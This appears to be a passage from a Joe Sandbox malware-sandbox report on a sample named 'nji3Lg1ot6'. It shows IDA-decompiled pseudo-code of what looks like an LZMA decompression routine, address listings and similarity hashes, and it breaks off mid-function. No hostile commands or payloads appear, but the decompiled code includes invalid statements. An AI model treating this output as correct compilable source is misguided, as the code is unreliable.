                      												goto L1;
                      											case 0x15:
                      												__eax = 0;
                      												__eflags =  *(__ebp - 0x38) - 7;
                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      												__al = __al & 0x000000fd;
                      												__eax = (__eflags >= 0) - 1 + 0xb;
                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                      												goto L120;
                      											case 0x16:
                      												__eax =  *(__ebp - 0x30);
                      												__eflags = __eax - 4;
                      												if(__eax >= 4) {
                      													_push(3);
                      													_pop(__eax);
                      												}
                      												__ecx =  *(__ebp - 4);
                      												 *(__ebp - 0x40) = 6;
                      												__eax = __eax << 7;
                      												 *(__ebp - 0x7c) = 0x19;
                      												 *(__ebp - 0x58) = __eax;
                      												goto L145;
                      											case 0x17:
                      												L145:
                      												__eax =  *(__ebp - 0x40);
                      												 *(__ebp - 0x50) = 1;
                      												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                      												goto L149;
                      											case 0x18:
                      												L146:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0x18;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t484 = __ebp - 0x70;
                      												 *_t484 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t484;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												L148:
                      												_t487 = __ebp - 0x48;
                      												 *_t487 =  *(__ebp - 0x48) - 1;
                      												__eflags =  *_t487;
                      												L149:
                      												__eflags =  *(__ebp - 0x48);
                      												if( *(__ebp - 0x48) <= 0) {
                      													__ecx =  *(__ebp - 0x40);
                      													__ebx =  *(__ebp - 0x50);
                      													0 = 1;
                      													__eax = 1 << __cl;
                      													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                      													__eax =  *(__ebp - 0x7c);
                      													 *(__ebp - 0x44) = __ebx;
                      													while(1) {
                      														 *(_t613 - 0x88) = _t533;
                      														goto L1;
                      													}
                      												}
                      												__eax =  *(__ebp - 0x50);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      												__eax =  *(__ebp - 0x58);
                      												__esi = __edx + __eax;
                      												 *(__ebp - 0x54) = __esi;
                      												__ax =  *__esi;
                      												__edi = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													__cx = __ax >> 5;
                      													__eax = __eax - __ecx;
                      													__edx = __edx + 1;
                      													__eflags = __edx;
                      													 *__esi = __ax;
                      													 *(__ebp - 0x50) = __edx;
                      												} else {
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edi;
                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													goto L148;
                      												} else {
                      													goto L146;
                      												}
                      											case 0x19:
                      												__eflags = __ebx - 4;
                      												if(__ebx < 4) {
                      													 *(__ebp - 0x2c) = __ebx;
                      													L119:
                      													_t393 = __ebp - 0x2c;
                      													 *_t393 =  *(__ebp - 0x2c) + 1;
                      													__eflags =  *_t393;
                      													L120:
                      													__eax =  *(__ebp - 0x2c);
                      													__eflags = __eax;
                      													if(__eax == 0) {
                      														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                      														goto L170;
                      													}
                      													__eflags = __eax -  *(__ebp - 0x60);
                      													if(__eax >  *(__ebp - 0x60)) {
                      														goto L171;
                      													}
                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                      													__eax =  *(__ebp - 0x30);
                      													_t400 = __ebp - 0x60;
                      													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                      													__eflags =  *_t400;
                      													goto L123;
                      												}
                      												__ecx = __ebx;
                      												__eax = __ebx;
                      												__ecx = __ebx >> 1;
                      												__eax = __ebx & 0x00000001;
                      												__ecx = (__ebx >> 1) - 1;
                      												__al = __al | 0x00000002;
                      												__eax = (__ebx & 0x00000001) << __cl;
                      												__eflags = __ebx - 0xe;
                      												 *(__ebp - 0x2c) = __eax;
                      												if(__ebx >= 0xe) {
                      													__ebx = 0;
                      													 *(__ebp - 0x48) = __ecx;
                      													L102:
                      													__eflags =  *(__ebp - 0x48);
                      													if( *(__ebp - 0x48) <= 0) {
                      														__eax = __eax + __ebx;
                      														 *(__ebp - 0x40) = 4;
                      														 *(__ebp - 0x2c) = __eax;
                      														__eax =  *(__ebp - 4);
                      														__eax =  *(__ebp - 4) + 0x644;
                      														__eflags = __eax;
                      														L108:
                      														__ebx = 0;
                      														 *(__ebp - 0x58) = __eax;
                      														 *(__ebp - 0x50) = 1;
                      														 *(__ebp - 0x44) = 0;
                      														 *(__ebp - 0x48) = 0;
                      														L112:
                      														__eax =  *(__ebp - 0x40);
                      														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                      															_t391 = __ebp - 0x2c;
                      															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                      															__eflags =  *_t391;
                      															goto L119;
                      														}
                      														__eax =  *(__ebp - 0x50);
                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      														__eax =  *(__ebp - 0x58);
                      														__esi = __edi + __eax;
                      														 *(__ebp - 0x54) = __esi;
                      														__ax =  *__esi;
                      														__ecx = __ax & 0x0000ffff;
                      														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                      														__eflags =  *(__ebp - 0xc) - __edx;
                      														if( *(__ebp - 0xc) >= __edx) {
                      															__ecx = 0;
                      															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                      															__ecx = 1;
                      															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                      															__ebx = 1;
                      															__ecx =  *(__ebp - 0x48);
                      															__ebx = 1 << __cl;
                      															__ecx = 1 << __cl;
                      															__ebx =  *(__ebp - 0x44);
                      															__ebx =  *(__ebp - 0x44) | __ecx;
                      															__cx = __ax;
                      															__cx = __ax >> 5;
                      															__eax = __eax - __ecx;
                      															__edi = __edi + 1;
                      															__eflags = __edi;
                      															 *(__ebp - 0x44) = __ebx;
                      															 *__esi = __ax;
                      															 *(__ebp - 0x50) = __edi;
                      														} else {
                      															 *(__ebp - 0x10) = __edx;
                      															0x800 = 0x800 - __ecx;
                      															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                      															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      															 *__esi = __dx;
                      														}
                      														__eflags =  *(__ebp - 0x10) - 0x1000000;
                      														if( *(__ebp - 0x10) >= 0x1000000) {
                      															L111:
                      															_t368 = __ebp - 0x48;
                      															 *_t368 =  *(__ebp - 0x48) + 1;
                      															__eflags =  *_t368;
                      															goto L112;
                      														} else {
                      															goto L109;
                      														}
                      													}
                      													__ecx =  *(__ebp - 0xc);
                      													__ebx = __ebx + __ebx;
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                      													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      													 *(__ebp - 0x44) = __ebx;
                      													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                      														__ecx =  *(__ebp - 0x10);
                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      														__ebx = __ebx | 0x00000001;
                      														__eflags = __ebx;
                      														 *(__ebp - 0x44) = __ebx;
                      													}
                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                      													if( *(__ebp - 0x10) >= 0x1000000) {
                      														L101:
                      														_t338 = __ebp - 0x48;
                      														 *_t338 =  *(__ebp - 0x48) - 1;
                      														__eflags =  *_t338;
                      														goto L102;
                      													} else {
                      														goto L99;
                      													}
                      												}
                      												__edx =  *(__ebp - 4);
                      												__eax = __eax - __ebx;
                      												 *(__ebp - 0x40) = __ecx;
                      												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                      												goto L108;
                      											case 0x1a:
                      												L56:
                      												__eflags =  *(__ebp - 0x64);
                      												if( *(__ebp - 0x64) == 0) {
                      													 *(__ebp - 0x88) = 0x1a;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x68);
                      												__al =  *(__ebp - 0x5c);
                      												__edx =  *(__ebp - 8);
                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      												 *( *(__ebp - 0x68)) = __al;
                      												__ecx =  *(__ebp - 0x14);
                      												 *(__ecx +  *(__ebp - 8)) = __al;
                      												__eax = __ecx + 1;
                      												__edx = 0;
                      												_t192 = __eax %  *(__ebp - 0x74);
                      												__eax = __eax /  *(__ebp - 0x74);
                      												__edx = _t192;
                      												goto L80;
                      											case 0x1b:
                      												L76:
                      												__eflags =  *(__ebp - 0x64);
                      												if( *(__ebp - 0x64) == 0) {
                      													 *(__ebp - 0x88) = 0x1b;
                      													goto L170;
                      												}
                      												__eax =  *(__ebp - 0x14);
                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      												__eflags = __eax -  *(__ebp - 0x74);
                      												if(__eax >=  *(__ebp - 0x74)) {
                      													__eax = __eax +  *(__ebp - 0x74);
                      													__eflags = __eax;
                      												}
                      												__edx =  *(__ebp - 8);
                      												__cl =  *(__eax + __edx);
                      												__eax =  *(__ebp - 0x14);
                      												 *(__ebp - 0x5c) = __cl;
                      												 *(__eax + __edx) = __cl;
                      												__eax = __eax + 1;
                      												__edx = 0;
                      												_t275 = __eax %  *(__ebp - 0x74);
                      												__eax = __eax /  *(__ebp - 0x74);
                      												__edx = _t275;
                      												__eax =  *(__ebp - 0x68);
                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      												_t284 = __ebp - 0x64;
                      												 *_t284 =  *(__ebp - 0x64) - 1;
                      												__eflags =  *_t284;
                      												 *( *(__ebp - 0x68)) = __cl;
                      												L80:
                      												 *(__ebp - 0x14) = __edx;
                      												goto L81;
                      											case 0x1c:
                      												while(1) {
                      													L123:
                      													__eflags =  *(__ebp - 0x64);
                      													if( *(__ebp - 0x64) == 0) {
                      														break;
                      													}
                      													__eax =  *(__ebp - 0x14);
                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      													__eflags = __eax -  *(__ebp - 0x74);
                      													if(__eax >=  *(__ebp - 0x74)) {
                      														__eax = __eax +  *(__ebp - 0x74);
                      														__eflags = __eax;
                      													}
                      													__edx =  *(__ebp - 8);
                      													__cl =  *(__eax + __edx);
                      													__eax =  *(__ebp - 0x14);
                      													 *(__ebp - 0x5c) = __cl;
                      													 *(__eax + __edx) = __cl;
                      													__eax = __eax + 1;
                      													__edx = 0;
                      													_t414 = __eax %  *(__ebp - 0x74);
                      													__eax = __eax /  *(__ebp - 0x74);
                      													__edx = _t414;
                      													__eax =  *(__ebp - 0x68);
                      													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                      													__eflags =  *(__ebp - 0x30);
                      													 *( *(__ebp - 0x68)) = __cl;
                      													 *(__ebp - 0x14) = _t414;
                      													if( *(__ebp - 0x30) > 0) {
                      														continue;
                      													} else {
                      														L81:
                      														 *(__ebp - 0x88) = 2;
                      														goto L1;
                      													}
                      												}
                      												 *(__ebp - 0x88) = 0x1c;
                      												goto L170;
                      										}
                      									}
                      									L171:
                      									_t535 = _t534 | 0xffffffff;
                      									goto L172;
                      								}
                      							}
                      						}
                      					}
                      					goto L1;
                      				}
                      			}













                      0x00406099
                      0x0040609c
                      0x004060ba
                      0x004060bc
                      0x00000000
                      0x0040609e
                      0x0040609e
                      0x004060a1
                      0x004060a4
                      0x004060a7
                      0x004060a9
                      0x004060a9
                      0x004060a9
                      0x004060ac
                      0x004060af
                      0x004060b1
                      0x004060b2
                      0x004060b5
                      0x00000000
                      0x004060b5
                      0x00000000
                      0x004062eb
                      0x004062ef
                      0x0040630d
                      0x00406310
                      0x00406317
                      0x0040631a
                      0x0040631d
                      0x00406320
                      0x00406323
                      0x00406326
                      0x00406328
                      0x0040632f
                      0x00406330
                      0x00406332
                      0x00406335
                      0x00406338
                      0x0040633b
                      0x0040633b
                      0x00406340
                      0x00000000
                      0x00406340
                      0x004062f1
                      0x004062f4
                      0x004062f7
                      0x00406301
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00000000
                      0x00406355
                      0x00406359
                      0x0040637c
                      0x0040637f
                      0x00406382
                      0x0040638c
                      0x0040635b
                      0x0040635b
                      0x0040635e
                      0x00406361
                      0x00406364
                      0x00406371
                      0x00406374
                      0x00406374
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00000000
                      0x00406398
                      0x0040639c
                      0x00000000
                      0x00000000
                      0x004063a2
                      0x004063a6
                      0x00000000
                      0x00000000
                      0x004063ac
                      0x004063ae
                      0x004063b2
                      0x004063b2
                      0x004063b5
                      0x004063b9
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406430
                      0x00406434
                      0x0040643b
                      0x0040643e
                      0x00406441
                      0x00406436
                      0x00406436
                      0x00406436
                      0x00406444
                      0x00406447
                      0x00000000
                      0x00000000
                      0x004064f0
                      0x004064f0
                      0x004064f4
                      0x00406892
                      0x00000000
                      0x00406892
                      0x004064fa
                      0x004064fd
                      0x00406500
                      0x00406504
                      0x00406507
                      0x0040650d
                      0x0040650f
                      0x0040650f
                      0x0040650f
                      0x00406512
                      0x00406515
                      0x00000000
                      0x00000000
                      0x004060e5
                      0x004060e5
                      0x004060e9
                      0x00406856
                      0x00000000
                      0x00406856
                      0x004060ef
                      0x004060f2
                      0x004060f5
                      0x004060f9
                      0x004060fc
                      0x00406102
                      0x00406104
                      0x00406104
                      0x00406104
                      0x00406107
                      0x0040610a
                      0x0040610a
                      0x0040610d
                      0x00406110
                      0x00000000
                      0x00000000
                      0x00406116
                      0x0040611c
                      0x00000000
                      0x00000000
                      0x00406122
                      0x00406122
                      0x00406126
                      0x00406129
                      0x0040612c
                      0x0040612f
                      0x00406132
                      0x00406133
                      0x00406136
                      0x00406138
                      0x0040613e
                      0x00406141
                      0x00406144
                      0x00406147
                      0x0040614a
                      0x0040614d
                      0x00406150
                      0x0040616c
                      0x0040616f
                      0x00406172
                      0x00406175
                      0x0040617c
                      0x00406180
                      0x00406182
                      0x00406186
                      0x00406152
                      0x00406152
                      0x00406156
                      0x0040615e
                      0x00406163
                      0x00406165
                      0x00406167
                      0x00406167
                      0x00406189
                      0x00406190
                      0x00406193
                      0x00000000
                      0x00406199
                      0x00000000
                      0x00406199
                      0x00000000
                      0x0040619e
                      0x0040619e
                      0x004061a2
                      0x00406862
                      0x00000000
                      0x00406862
                      0x004061a8
                      0x004061ab
                      0x004061ae
                      0x004061b2
                      0x004061b5
                      0x004061bb
                      0x004061bd
                      0x004061bd
                      0x004061bd
                      0x004061c0
                      0x004061c3
                      0x004061c3
                      0x004061c3
                      0x004061c9
                      0x00000000
                      0x00000000
                      0x004061cb
                      0x004061ce
                      0x004061d1
                      0x004061d4
                      0x004061d7
                      0x004061da
                      0x004061dd
                      0x004061e0
                      0x004061e3
                      0x004061e6
                      0x004061e9
                      0x00406201
                      0x00406204
                      0x00406207
                      0x0040620a
                      0x0040620a
                      0x0040620d
                      0x00406211
                      0x00406213
                      0x004061eb
                      0x004061eb
                      0x004061f3
                      0x004061f8
                      0x004061fa
                      0x004061fc
                      0x004061fc
                      0x00406216
                      0x0040621d
                      0x00406220
                      0x00000000
                      0x00406222
                      0x00000000
                      0x00406222
                      0x00406220
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00000000
                      0x00000000
                      0x00406262
                      0x00406262
                      0x00406266
                      0x0040686e
                      0x00000000
                      0x0040686e
                      0x0040626c
                      0x0040626f
                      0x00406272
                      0x00406276
                      0x00406279
                      0x0040627f
                      0x00406281
                      0x00406281
                      0x00406281
                      0x00406284
                      0x00406287
                      0x00406287
                      0x0040628d
                      0x0040622b
                      0x0040622b
                      0x0040622e
                      0x00000000
                      0x0040622e
                      0x0040628f
                      0x0040628f
                      0x00406292
                      0x00406295
                      0x00406298
                      0x0040629b
                      0x0040629e
                      0x004062a1
                      0x004062a4
                      0x004062a7
                      0x004062aa
                      0x004062ad
                      0x004062c5
                      0x004062c8
                      0x004062cb
                      0x004062ce
                      0x004062ce
                      0x004062d1
                      0x004062d5
                      0x004062d7
                      0x004062af
                      0x004062af
                      0x004062b7
                      0x004062bc
                      0x004062be
                      0x004062c0
                      0x004062c0
                      0x004062da
                      0x004062e1
                      0x004062e4
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x00406573
                      0x00406573
                      0x00406577
                      0x0040689e
                      0x00000000
                      0x0040689e
                      0x0040657d
                      0x00406580
                      0x00406583
                      0x00406587
                      0x0040658a
                      0x00406590
                      0x00406592
                      0x00406592
                      0x00406592
                      0x00406595
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406682
                      0x00406686
                      0x004066a8
                      0x004066ab
                      0x004066b5
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x004066b8
                      0x00406688
                      0x0040668b
                      0x0040668f
                      0x00406692
                      0x00406692
                      0x00406695
                      0x00000000
                      0x00000000
                      0x0040673f
                      0x00406743
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00406776
                      0x00406776
                      0x00000000
                      0x00406776
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406833
                      0x00406734
                      0x00000000
                      0x00000000
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00406481
                      0x00406484
                      0x00406487
                      0x00406489
                      0x0040648b
                      0x0040648b
                      0x0040648c
                      0x0040648f
                      0x00406496
                      0x00406499
                      0x004064a7
                      0x00000000
                      0x00000000
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x00000000
                      0x0040678c
                      0x0040678c
                      0x00406790
                      0x004068c8
                      0x00000000
                      0x004068c8
                      0x00406796
                      0x00406799
                      0x0040679c
                      0x004067a0
                      0x004067a3
                      0x004067a9
                      0x004067ab
                      0x004067ab
                      0x004067ab
                      0x004067ae
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b4
                      0x004067b4
                      0x004067b8
                      0x00406818
                      0x0040681b
                      0x00406820
                      0x00406821
                      0x00406823
                      0x00406825
                      0x00406828
                      0x00406734
                      0x00406734
                      0x00000000
                      0x0040673a
                      0x00406734
                      0x004067ba
                      0x004067c0
                      0x004067c3
                      0x004067c6
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067d8
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x004067fa
                      0x004067fd
                      0x00406801
                      0x00406803
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067e5
                      0x004067ea
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x0040680a
                      0x00406811
                      0x00000000
                      0x00406813
                      0x00000000
                      0x00406813
                      0x00000000
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x004063f7
                      0x004063f7
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040667b
                      0x004068b0
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x004068e7
                      0x004068e7
                      0x00000000
                      0x004068e7
                      0x00406734
                      0x004066bb
                      0x004066b8
                      0x00000000
                      0x0040640d

                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                      • Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
                      • Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                      • Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E00406355() {
                      				unsigned short _t531;
                      				signed int _t532;
                      				void _t533;
                      				signed int _t534;
                      				signed int _t535;
                      				signed int _t565;
                      				signed int _t568;
                      				signed int _t589;
                      				signed int* _t606;
                      				void* _t613;
                      
                      				L0:
                      				while(1) {
                      					L0:
                      					if( *(_t613 - 0x40) != 0) {
                      						 *(_t613 - 0x84) = 0xa;
                      						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                      					} else {
                      						 *(__ebp - 0x84) = 9;
                      						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                      					}
                      					while(1) {
                      						 *(_t613 - 0x54) = _t606;
                      						while(1) {
                      							L133:
                      							_t531 =  *_t606;
                      							_t589 = _t531 & 0x0000ffff;
                      							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                      							if( *(_t613 - 0xc) >= _t565) {
                      								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                      								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                      								 *(_t613 - 0x40) = 1;
                      								_t532 = _t531 - (_t531 >> 5);
                      								 *_t606 = _t532;
                      							} else {
                      								 *(_t613 - 0x10) = _t565;
                      								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                      								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                      							}
                      							if( *(_t613 - 0x10) >= 0x1000000) {
                      								goto L139;
                      							}
                      							L137:
                      							if( *(_t613 - 0x6c) == 0) {
                      								 *(_t613 - 0x88) = 5;
                      								L170:
                      								_t568 = 0x22;
                      								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                      								_t535 = 0;
                      								L172:
                      								return _t535;
                      							}
                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                      							L139:
                      							_t533 =  *(_t613 - 0x84);
                      							while(1) {
                      								 *(_t613 - 0x88) = _t533;
                      								while(1) {
                      									L1:
                      									_t534 =  *(_t613 - 0x88);
                      									if(_t534 > 0x1c) {
                      										break;
                      									}
                      									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                      										case 0:
                      											if( *(_t613 - 0x6c) == 0) {
                      												goto L170;
                      											}
                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      											_t534 =  *( *(_t613 - 0x70));
                      											if(_t534 > 0xe1) {
                      												goto L171;
                      											}
                      											_t538 = _t534 & 0x000000ff;
                      											_push(0x2d);
                      											asm("cdq");
                      											_pop(_t570);
                      											_push(9);
                      											_pop(_t571);
                      											_t609 = _t538 / _t570;
                      											_t540 = _t538 % _t570 & 0x000000ff;
                      											asm("cdq");
                      											_t604 = _t540 % _t571 & 0x000000ff;
                      											 *(_t613 - 0x3c) = _t604;
                      											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                      											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                      											_t612 = (0x300 << _t604 + _t609) + 0x736;
                      											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                      												L10:
                      												if(_t612 == 0) {
                      													L12:
